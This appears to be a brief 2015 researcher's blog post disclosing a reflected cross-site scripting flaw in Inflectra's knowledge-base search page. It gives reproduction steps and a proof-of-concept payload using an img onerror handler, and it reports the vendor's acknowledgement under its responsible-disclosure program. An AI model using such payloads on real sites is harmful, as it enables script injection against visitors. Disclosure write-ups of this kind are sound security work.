Sunday 4 October 2015

Inflectra Security Hall of fame

Vulnerability: Reflected Cross Site Scripting XSS
Vuln URL: http://www.inflectra.com/Support/KnowledgeBase/List.aspx

Steps:

1. Browse URL -> http://www.inflectra.com/Support/KnowledgeBase/List.aspx

2. Input following payload script to search box

"><img src=: '"><img src=a onerror=prompt(document.domain);>





Inflectra Team acknowledged me for disclosing security issues to them.
Check here -> https://www.inflectra.com/company/responsible-disclosure.aspx